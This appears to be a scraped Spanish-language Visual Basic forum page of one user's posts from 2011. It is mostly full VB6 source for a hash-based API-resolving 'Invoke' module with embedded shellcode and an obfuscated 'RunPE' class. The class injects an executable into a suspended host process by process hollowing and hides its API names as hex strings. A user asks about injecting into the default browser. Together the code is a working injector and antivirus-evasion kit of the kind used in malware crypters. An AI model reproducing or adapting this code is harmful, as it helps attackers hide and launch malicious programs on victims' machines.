Cita de: RHL en 11 Diciembre 2011, 18:52 PM
tu hash esta malo
porque? I've used the Karcrack Generator and only added "&H" before every generated, anything else must be done?
Thanks
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Mostrar Mensajes MenúCita de: RHL en 11 Diciembre 2011, 18:52 PM
tu hash esta malo
Public Function GetResDataBytes(ByVal ResType As Long, ByVal ResName As Long) As Byte()
Dim hRsrc As Long
Dim hGlobal As Long
Dim lpData As Long
Dim Size As Long
Dim hMod As Long
Dim B() As Byte
hMod = App.hInstance
'FindResourceW,&H3BD09A6B
hRsrc = Invoke(("KERNEL32"), (&H3BD09A6B), hMod, ResName, ResType)
If hRsrc > 0 Then
'LoadResource,&H934E1F7B
hGlobal = Invoke(("KERNEL32"), (&H934E1F7B), hMod, hRsrc)
'LockResource,&H9A4E2F7B
lpData = Invoke(("KERNEL32"), (&H9A4E2F7B), hGlobal)
'SizeofResource,&H3F2A9609
Size = Invoke(("KERNEL32"), (&H3F2A9609), hMod, hRsrc)
If Size > 0 Then
ReDim B(0 To Size) As Byte
'RtlMoveMemory,&HCF14E85B
Invoke ("KERNEL32"), (&HCF14E85B), VarPtr(B(0)), lpData, Size
'FreeResource,&H54423F7C
Invoke ("KERNEL32"), (&H54423F7C), hGlobal
GetResDataBytes = B()
End If
'FreeLibrary,&H4DC9D5A0
Invoke ("KERNEL32"), (&H4DC9D5A0), hMod
End If
End Function
Option Explicit
Private Type DWORD_L
D1 As Long
End Type
Private Type DWORD_B
B1 As Byte: B2 As Byte: B3 As Byte: B4 As Byte
End Type
Public Declare Function CWPW Lib "user32" Alias "CallWindowProcW" (ByVal Address As Any, Optional ByVal Param1 As Long, Optional ByVal Param2 As Long, Optional ByVal Param3 As Long, Optional ByVal Param4 As Long) As Long
Private bInitialized_Inv As Boolean
Private ASM_gAPIPTR(0 To 170) As Byte
Private ASM_cCODE(0 To 255) As Byte
Public Function Invoke(ByVal sDLL As String, ByVal hHash As Long, ParamArray vParams() As Variant) As Long
Dim vItem As Variant
Dim bsTmp As DWORD_B
Dim lAPI As Long
Dim i As Long
Dim w As Long
If Not bInitialized_Inv Then
For Each vItem In Array(&HE8, &H22, &H0, &H0, &H0, &H68, &HA4, &H4E, &HE, &HEC, &H50, &HE8, &H43, &H0, &H0, &H0, &H83, &HC4, &H8, &HFF, &H74, &H24, &H4, &HFF, &HD0, &HFF, &H74, &H24, &H8, &H50, &HE8, &H30, &H0, &H0, &H0, &H83, &HC4, &H8, &HC3, &H56, &H55, &H31, &HC0, &H64, &H8B, &H70, &H30, &H8B, &H76, &HC, &H8B, &H76, &H1C, &H8B, &H6E, &H8, &H8B, &H7E, &H20, &H8B, &H36, &H38, &H47, &H18, &H75, &HF3, &H80, &H3F, &H6B, &H74, &H7, &H80, &H3F, &H4B, &H74, &H2, &HEB, &HE7, &H89, &HE8, &H5D, &H5E, &HC3, &H55, &H52, &H51, _
&H53, &H56, &H57, &H8B, &H6C, &H24, &H1C, &H85, &HED, &H74, &H43, &H8B, &H45, &H3C, &H8B, &H54, &H5, &H78, &H1, &HEA, &H8B, &H4A, &H18, &H8B, &H5A, &H20, &H1, &HEB, &HE3, &H30, &H49, &H8B, &H34, &H8B, &H1, &HEE, &H31, &HFF, &H31, &HC0, &HFC, &HAC, &H84, &HC0, &H74, &H7, &HC1, &HCF, &HD, &H1, &HC7, &HEB, &HF4, &H3B, &H7C, &H24, &H20, &H75, &HE1, &H8B, &H5A, &H24, &H1, &HEB, &H66, &H8B, &HC, &H4B, &H8B, &H5A, &H1C, &H1, &HEB, &H8B, &H4, &H8B, &H1, &HE8, &H5F, &H5E, &H5B, &H59, &H5A, &H5D, &HC3)
ASM_gAPIPTR(i) = CByte(vItem)
i = i + 1
Next vItem
i = 0
bInitialized_Inv = True
End If
lAPI = CWPW(VarPtr(ASM_gAPIPTR(0)), StrPtr(sDLL), hHash)
If lAPI Then
For w = UBound(vParams) To LBound(vParams) Step -1
vItem = vParams(w)
bsTmp = SliceLong(CLng(vItem))
'// PUSH ADDR
ASM_cCODE(i) = &H68: i = i + 1
ASM_cCODE(i) = bsTmp.B1: i = i + 1
ASM_cCODE(i) = bsTmp.B2: i = i + 1
ASM_cCODE(i) = bsTmp.B3: i = i + 1
ASM_cCODE(i) = bsTmp.B4: i = i + 1
Next w
bsTmp = SliceLong(lAPI)
'// MOV EAX, ADDR
ASM_cCODE(i) = &HB8: i = i + 1
ASM_cCODE(i) = bsTmp.B1: i = i + 1
ASM_cCODE(i) = bsTmp.B2: i = i + 1
ASM_cCODE(i) = bsTmp.B3: i = i + 1
ASM_cCODE(i) = bsTmp.B4: i = i + 1
'// CALL EAX
ASM_cCODE(i) = &HFF: i = i + 1
ASM_cCODE(i) = &HD0: i = i + 1
'// RET
ASM_cCODE(i) = &HC3: i = i + 1
Invoke = CWPW(VarPtr(ASM_cCODE(0)))
Else
Invoke = -1
'Err.Raise -1, , "Bad Hash or wrong DLL"
End If
End Function
Private Function SliceLong(ByVal lLong As Long) As DWORD_B
Dim tL As DWORD_L
tL.D1 = lLong
LSet SliceLong = tL
End Function
Cita de: BlackZeroX (Astaroth) en 24 Noviembre 2011, 18:23 PM
no hay errore en el codigo... solo no hice lo que se pedia...
error:
1 byte = 8 bits
5 = 0000 0101
6 = 0000 0110
7 = 0000 0111
8 = 0000 1000
1 long = 32 bits = 4 bytes
Al realizar un CopyMemory ltmp, test(0), &H4
134678021 = 0000 1000 0000 0111 0000 0110 0000 1000
para que arroje 5678 sse debe de hacer...
5678 = 0000 0000 0000 0000 0001 0110 0010 1110
Option Explicit
Private Sub Form_Load()
Dim bByte(0 To 3) As Byte
Dim dwResParse As Long
Dim dwPow As Long
Dim i As Long
bByte(0) = 5: bByte(1) = 6: bByte(2) = 7: bByte(3) = 8
dwPow = UBound(bByte)
For i = 0 To dwPow
dwResParse = dwResParse + (bByte(i) * 10 ^ (dwPow - i))
Next i
MsgBox dwResParse
End Sub
Lee un poco mas de Teoria...
Dulces Lunas!¡.
Cita de: BlackZeroX (Astaroth) en 19 Noviembre 2011, 23:39 PM
.
Solo realiza la suma de la posicion de cada miembro de la estructura...
'---------------------------------------------------------------------------------------
' Module : cNtPEL
' DateTime : 30/06/2009 06:32
' Author : Cobein
' Mail : cobein27@hotmail.com
' WebPage : http://www.advancevb.com.ar (updated =D)
' Purpose : Inject Exe
' Usage : At your own risk
' Requirements: None
' Distribution: You can freely use this code in your own
' applications, but you may not reproduce
' or publish this code on any web site,
' online service, or distribute as source
' on any media without express permission.
'
' Thanks to : This is gonna be a looong list xD
' Batfitch - kernel base asm
' Karcrack - For helping me to debug and test it
' Paul Caton - vTable patch examples
' rm_code - First call api prototype
' and different books and pappers
'
' Compile : P-Code !!!
'
' Comments : Coded on top of the invoke module.
'
' History : 30/06/2009 First Cut....................................................
' 02/08/2009 Modded By Karcrack, Now is NtRunPEL, thanks Slayer (;........
'---------------------------------------------------------------------------------------
Option Explicit
Private Const IMAGE_DOS_SIGNATURE As Long = &H5A4D&
Private Const IMAGE_NT_SIGNATURE As Long = &H4550&
Private Const SIZE_DOS_HEADER As Long = &H40
Private Const SIZE_NT_HEADERS As Long = &HF8
Private Const SIZE_EXPORT_DIRECTORY As Long = &H28
Private Const SIZE_IMAGE_SECTION_HEADER As Long = &H28
Private Const THUNK_APICALL As String = "8B4C240851<PATCH1>E8<PATCH2>5989016631C0C3"
Private Const THUNK_KERNELBASE As String = "8B5C240854B830000000648B008B400C8B401C8B008B400889035C31C0C3"
Private Const PATCH1 As String = "<PATCH1>"
Private Const PATCH2 As String = "<PATCH2>"
Private Const CONTEXT_FULL As Long = &H10007
Private Const CREATE_SUSPENDED As Long = &H4
Private Const MEM_COMMIT As Long = &H1000
Private Const MEM_RESERVE As Long = &H2000
Private Const PAGE_EXECUTE_READWRITE As Long = &H40
Private Type STARTUPINFO
cb As Long
lpReserved As Long
lpDesktop As Long
lpTitle As Long
dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As Long
hStdInput As Long
hStdOutput As Long
hStdError As Long
End Type
Private Type PROCESS_INFORMATION
hProcess As Long
hThread As Long
dwProcessID As Long
dwThreadID As Long
End Type
Private Type FLOATING_SAVE_AREA
ControlWord As Long
StatusWord As Long
TagWord As Long
ErrorOffset As Long
ErrorSelector As Long
DataOffset As Long
DataSelector As Long
RegisterArea(1 To 80) As Byte
Cr0NpxState As Long
End Type
Private Type CONTEXT
ContextFlags As Long
Dr0 As Long
Dr1 As Long
Dr2 As Long
Dr3 As Long
Dr6 As Long
Dr7 As Long
FloatSave As FLOATING_SAVE_AREA
SegGs As Long
SegFs As Long
SegEs As Long
SegDs As Long
Edi As Long
Esi As Long
Ebx As Long
Edx As Long
Ecx As Long
Eax As Long
Ebp As Long
Eip As Long
SegCs As Long
EFlags As Long
Esp As Long
SegSs As Long
End Type
Private Type IMAGE_DOS_HEADER
e_magic As Integer
e_cblp As Integer
e_cp As Integer
e_crlc As Integer
e_cparhdr As Integer
e_minalloc As Integer
e_maxalloc As Integer
e_ss As Integer
e_sp As Integer
e_csum As Integer
e_ip As Integer
e_cs As Integer
e_lfarlc As Integer
e_ovno As Integer
e_res(0 To 3) As Integer
e_oemid As Integer
e_oeminfo As Integer
e_res2(0 To 9) As Integer
e_lfanew As Long
End Type
Private Type IMAGE_FILE_HEADER
Machine As Integer
NumberOfSections As Integer
TimeDateStamp As Long
PointerToSymbolTable As Long
NumberOfSymbols As Long
SizeOfOptionalHeader As Integer
Characteristics As Integer
End Type
Private Type IMAGE_DATA_DIRECTORY
VirtualAddress As Long
Size As Long
End Type
Private Type IMAGE_OPTIONAL_HEADER
Magic As Integer
MajorLinkerVersion As Byte
MinorLinkerVersion As Byte
SizeOfCode As Long
SizeOfInitializedData As Long
SizeOfUnitializedData As Long
AddressOfEntryPoint As Long
BaseOfCode As Long
BaseOfData As Long
ImageBase As Long
SectionAlignment As Long
FileAlignment As Long
MajorOperatingSystemVersion As Integer
MinorOperatingSystemVersion As Integer
MajorImageVersion As Integer
MinorImageVersion As Integer
MajorSubsystemVersion As Integer
MinorSubsystemVersion As Integer
W32VersionValue As Long
SizeOfImage As Long
SizeOfHeaders As Long
CheckSum As Long
SubSystem As Integer
DllCharacteristics As Integer
SizeOfStackReserve As Long
SizeOfStackCommit As Long
SizeOfHeapReserve As Long
SizeOfHeapCommit As Long
LoaderFlags As Long
NumberOfRvaAndSizes As Long
DataDirectory(0 To 15) As IMAGE_DATA_DIRECTORY
End Type
Private Type IMAGE_NT_HEADERS
Signature As Long
FileHeader As IMAGE_FILE_HEADER
OptionalHeader As IMAGE_OPTIONAL_HEADER
End Type
Private Type IMAGE_EXPORT_DIRECTORY
Characteristics As Long
TimeDateStamp As Long
MajorVersion As Integer
MinorVersion As Integer
lpName As Long
Base As Long
NumberOfFunctions As Long
NumberOfNames As Long
lpAddressOfFunctions As Long
lpAddressOfNames As Long
lpAddressOfNameOrdinals As Long
End Type
Private Type IMAGE_SECTION_HEADER
SecName As String * 8
VirtualSize As Long
VirtualAddress As Long
SizeOfRawData As Long
PointerToRawData As Long
PointerToRelocations As Long
PointerToLinenumbers As Long
NumberOfRelocations As Integer
NumberOfLinenumbers As Integer
Characteristics As Long
End Type
Private Declare Sub CpyMem Lib "kernel32" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal dlen As Long)
Private c_lKrnl As Long
Private c_lLoadLib As Long
Private c_bInit As Boolean
Private c_lVTE As Long
Private c_lOldVTE As Long
Private c_bvASM(&HFF) As Byte
Public Function zDoNotCall() As Long
'This function will be replaced with machine code laterz
'Do not add any public procedure on top of it
End Function
Public Function RunPE(ByRef bvBuff() As Byte, Optional sHost As String, Optional ByRef hProc As Long) As Boolean
Dim i As Long
Dim tIMAGE_DOS_HEADER As IMAGE_DOS_HEADER
Dim tIMAGE_NT_HEADERS As IMAGE_NT_HEADERS
Dim tIMAGE_SECTION_HEADER As IMAGE_SECTION_HEADER
Dim tSTARTUPINFO As STARTUPINFO
Dim tPROCESS_INFORMATION As PROCESS_INFORMATION
Dim tCONTEXT As CONTEXT
Dim lKernel As Long
Dim lNTDll As Long
Dim lMod As Long
If Not c_bInit Then Exit Function
Call CpyMem(tIMAGE_DOS_HEADER, bvBuff(0), SIZE_DOS_HEADER)
If Not tIMAGE_DOS_HEADER.e_magic = IMAGE_DOS_SIGNATURE Then
Exit Function
End If
Call CpyMem(tIMAGE_NT_HEADERS, bvBuff(tIMAGE_DOS_HEADER.e_lfanew), SIZE_NT_HEADERS)
If Not tIMAGE_NT_HEADERS.Signature = IMAGE_NT_SIGNATURE Then
Exit Function
End If
'kernel32
lKernel = LoadLibrary(nlfpkgnrj("6B65726E656C3332")) 'KPC
'ntdll
lNTDll = LoadLibrary(nlfpkgnrj("6E74646C6C")) 'KPC
If sHost = vbNullString Then
sHost = Space(260)
'GetModuleFileNameW
lMod = GetProcAddress(lKernel, nlfpkgnrj("4765744D6F64756C6546696C654E616D6557")) 'KPC
Invoke lMod, App.hInstance, StrPtr(sHost), 260
End If
With tIMAGE_NT_HEADERS.OptionalHeader
tSTARTUPINFO.cb = Len(tSTARTUPINFO)
'CreateProcessW
lMod = GetProcAddress(lKernel, nlfpkgnrj("43726561746550726F6365737357")) 'KPC
Invoke lMod, 0, StrPtr(sHost), 0, 0, 0, CREATE_SUSPENDED, 0, 0, VarPtr(tSTARTUPINFO), VarPtr(tPROCESS_INFORMATION)
'NtUnmapViewOfSection
lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74556E6D6170566965774F6653656374696F6E")) 'KPC
Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase
'VirtualAllocEx
lMod = GetProcAddress(lKernel, nlfpkgnrj("5669727475616C416C6C6F634578")) 'KPC
Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase, .SizeOfImage, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE
'NtWriteVirtualMemory
lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E7457726974655669727475616C4D656D6F7279")) 'KPC
Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase, VarPtr(bvBuff(0)), .SizeOfHeaders, 0
For i = 0 To tIMAGE_NT_HEADERS.FileHeader.NumberOfSections - 1
CpyMem tIMAGE_SECTION_HEADER, bvBuff(tIMAGE_DOS_HEADER.e_lfanew + SIZE_NT_HEADERS + SIZE_IMAGE_SECTION_HEADER * i), Len(tIMAGE_SECTION_HEADER)
Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase + tIMAGE_SECTION_HEADER.VirtualAddress, VarPtr(bvBuff(tIMAGE_SECTION_HEADER.PointerToRawData)), tIMAGE_SECTION_HEADER.SizeOfRawData, 0
Next i
tCONTEXT.ContextFlags = CONTEXT_FULL
'NtGetContextThread
lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74476574436F6E74657874546872656164")) 'KPC
Invoke lMod, tPROCESS_INFORMATION.hThread, VarPtr(tCONTEXT)
'NtWriteVirtualMemory
lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E7457726974655669727475616C4D656D6F7279")) 'KPC
Invoke lMod, tPROCESS_INFORMATION.hProcess, tCONTEXT.Ebx + 8, VarPtr(.ImageBase), 4, 0
tCONTEXT.Eax = .ImageBase + .AddressOfEntryPoint
'NtSetContextThread
lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74536574436F6E74657874546872656164")) 'KPC
Invoke lMod, tPROCESS_INFORMATION.hThread, VarPtr(tCONTEXT)
'NtResumeThread
lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74526573756D65546872656164")) 'KPC
Invoke lMod, tPROCESS_INFORMATION.hThread, 0
hProc = tPROCESS_INFORMATION.hProcess
End With
RunPE = True
End Function
Public Function Invoke(ByVal lMod As Long, ParamArray Params()) As Long
Dim lPtr As Long
Dim i As Long
Dim sData As String
Dim sParams As String
If lMod = 0 Then Exit Function
For i = UBound(Params) To 0 Step -1
sParams = sParams & "68" & GetLong(CLng(Params(i)))
Next
lPtr = VarPtr(c_bvASM(0))
lPtr = lPtr + (UBound(Params) + 2) * 5
lPtr = lMod - lPtr - 5
sData = THUNK_APICALL
sData = Replace(sData, PATCH1, sParams)
sData = Replace(sData, PATCH2, GetLong(lPtr))
Call PutThunk(sData)
Invoke = PatchCall
End Function
Private Function GetLong(ByVal lData As Long) As String
Dim bvTemp(3) As Byte
Dim i As Long
CpyMem bvTemp(0), lData, &H4
For i = 0 To 3
GetLong = GetLong & Right("0" & Hex(bvTemp(i)), 2)
Next
End Function
Private Sub PutThunk(ByVal sThunk As String)
Dim i As Long
For i = 0 To Len(sThunk) - 1 Step 2
c_bvASM((i / 2)) = CByte("&h" & Mid$(sThunk, i + 1, 2))
Next i
End Sub
Private Function PatchCall() As Long
CpyMem c_lVTE, ByVal ObjPtr(Me), &H4
c_lVTE = c_lVTE + &H1C
CpyMem c_lOldVTE, ByVal c_lVTE, &H4
CpyMem ByVal c_lVTE, VarPtr(c_bvASM(0)), &H4
PatchCall = zDoNotCall
CpyMem ByVal c_lVTE, c_lOldVTE, &H4
End Function
Public Function GetMod(ByVal sLib As String, ByVal sProc As String) As Long
GetMod = Me.GetProcAddress(Me.LoadLibrary(sLib), sProc)
End Function
Public Function LoadLibrary(ByVal sLib As String) As Long
LoadLibrary = Invoke(c_lLoadLib, StrPtr(sLib & vbNullChar))
End Function
Public Property Get Initialized() As Boolean
Initialized = c_bInit
End Property
Public Sub Class_Initialize()
Call PutThunk(THUNK_KERNELBASE)
c_lKrnl = PatchCall
If Not c_lKrnl = 0 Then
c_lLoadLib = GetProcAddress(c_lKrnl, "LoadLibraryW")
If Not c_lLoadLib = 0 Then
c_bInit = True
End If
End If
End Sub
Public Function GetProcAddress(ByVal lMod As Long, ByVal sProc As String) As Long
Dim tIMAGE_DOS_HEADER As IMAGE_DOS_HEADER
Dim tIMAGE_NT_HEADERS As IMAGE_NT_HEADERS
Dim tIMAGE_EXPORT_DIRECTORY As IMAGE_EXPORT_DIRECTORY
Call CpyMem(tIMAGE_DOS_HEADER, ByVal lMod, SIZE_DOS_HEADER)
If Not tIMAGE_DOS_HEADER.e_magic = IMAGE_DOS_SIGNATURE Then
Exit Function
End If
Call CpyMem(tIMAGE_NT_HEADERS, ByVal lMod + tIMAGE_DOS_HEADER.e_lfanew, SIZE_NT_HEADERS)
If Not tIMAGE_NT_HEADERS.Signature = IMAGE_NT_SIGNATURE Then
Exit Function
End If
Dim lVAddress As Long
Dim lVSize As Long
Dim lBase As Long
With tIMAGE_NT_HEADERS.OptionalHeader
lVAddress = lMod + .DataDirectory(0).VirtualAddress
lVSize = lVAddress + .DataDirectory(0).Size
lBase = .ImageBase
End With
Call CpyMem(tIMAGE_EXPORT_DIRECTORY, ByVal lVAddress, SIZE_EXPORT_DIRECTORY)
Dim i As Long
Dim lFunctAdd As Long
Dim lNameAdd As Long
Dim lNumbAdd As Long
With tIMAGE_EXPORT_DIRECTORY
For i = 0 To .NumberOfNames - 1
CpyMem lNameAdd, ByVal lBase + .lpAddressOfNames + i * 4, 4
If StringFromPtr(lBase + lNameAdd) = sProc Then
CpyMem lNumbAdd, ByVal lBase + .lpAddressOfNameOrdinals + i * 2, 2
CpyMem lFunctAdd, ByVal lBase + .lpAddressOfFunctions + lNumbAdd * 4, 4
GetProcAddress = lFunctAdd + lBase
If GetProcAddress >= lVAddress And _
GetProcAddress <= lVSize Then
Call ResolveForward(GetProcAddress, lMod, sProc)
If Not lMod = 0 Then
GetProcAddress = GetProcAddress(lMod, sProc)
Else
GetProcAddress = 0
End If
End If
Exit Function
End If
Next
End With
End Function
Private Function ResolveForward( _
ByVal lAddress As Long, _
ByRef lLib As Long, _
ByRef sMod As String)
Dim sForward As String
sForward = StringFromPtr(lAddress)
If InStr(1, sForward, ".") Then
lLib = LoadLibrary(Split(sForward, ".")(0))
sMod = Split(sForward, ".")(1)
End If
End Function
Private Function StringFromPtr( _
ByVal lAddress As Long) As String
Dim bChar As Byte
Do
CpyMem bChar, ByVal lAddress, 1
lAddress = lAddress + 1
If bChar = 0 Then Exit Do
StringFromPtr = StringFromPtr & Chr$(bChar)
Loop
End Function
Private Function nlfpkgnrj(ByVal sData As String) As String
Dim i As Long
For i = 1 To Len(sData) Step 2
nlfpkgnrj = nlfpkgnrj & Chr$(Val("&H" & Mid$(sData, i, 2)))
Next i
End Function
Option Explicit
Private Declare Function FreeLibrary Lib "kernel32" (ByVal hLibModule As Long) As Long
Private Declare Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As Long
Private Declare Function proceso Lib "kernel32" Alias "GetProcAddress" (ByVal hModule As Long, ByVal lpProcName As String) As Long
Private Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Any, ByVal wParam As Any, ByVal lParam As Any) As Long
Private Sub Form_Load()
Dim hLib As Long
Dim oClass As Class1
Set oClass = New Class1
hLib = LoadLibrary("user32")
MsgBox oClass.GetProcAddress(hLib, "MessageBoxA") & vbCrLf & proceso(hLib, "MessageBoxA")
FreeLibrary hLib
Set oClass = Nothing
End Sub
Dulces Lunas!¡.
Cita de: BUNNN en 10 Noviembre 2011, 23:30 PM
@Karcrack Run-pe doesn't works if i compile with "Remove Array Bound Check" enabled.
Checked with inject to: this exe and default browser.
I can't manage to make run-pe to work with this, only call api by name.
Cita de: BlackZeroX (Astaroth) en 7 Noviembre 2011, 19:55 PM
.
lammer
Dulces Lunas!¡.